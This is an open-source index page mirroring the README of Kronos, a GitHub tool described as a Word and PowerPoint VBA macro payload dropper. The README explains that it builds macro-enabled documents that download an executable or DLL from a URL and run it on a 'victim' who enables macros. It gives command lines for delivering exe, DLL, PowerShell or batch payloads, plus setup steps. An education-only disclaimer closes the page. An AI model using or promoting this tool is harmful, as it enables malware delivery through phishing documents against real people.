An open API service indexing awesome lists of open source software.

https://github.com/elmerikh/kronos

MS Word , PPT Macros VBA payload Dropper tool ⏳
https://github.com/elmerikh/kronos

cybersecurity macros--injector macros-payload ms-exploit payload-injector pe-injector powershell-payload powershell-script ppt-exploit redteam-tools redteaming vba-exploit vba-macros vba-word word-exploit word-exploit-builder word-macros-injector

Last synced: 3 days ago
JSON representation

MS Word , PPT Macros VBA payload Dropper tool ⏳

Awesome Lists containing this project

README

        

![!\[Alt text\](<>)](<2023-12-24 10_34_53-Photos.png>)

Greetings
--------------------------

Kronos is a doc and ppt exploitation tool to deliver Payloads via Vba macros by downloding the PE from a URL

it generates a docm or pptm , if macros disabled by default ,victim needs to enable macros

for an exe use :

python kronos.py -Url 'https://your.link' --word_file 'if you have a docx file' -PE 'name.exe'

for a dll use :

python kronos.py -Url 'https://your.link' --word_file 'if you have a docx file' -PE " {rundll32 or regsvr32} {name.dll} ,{function if needed} "

you can also run a ps1 or bat file or any shell cmd

https://github.com/ELMERIKH/Kronos/assets/96123439/e1efc4e7-5b63-4fdc-8076-400eae8b6f85

setup:
------------

git clone https://github.com/ELMERIKH/Kronos

pip install -r requirements.txt

python3 Kronos.py

DISCLAIMER :
----------------------------------

ME The author takes NO responsibility and/or liability for how you choose to use any of the tools/source code/any files provided. ME The author and anyone affiliated with will not be liable for any losses and/or damages in connection with use of Kronos. By using Kronos or any files included, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again Kronos is for EDUCATION and/or RESEARCH purposes ONLY.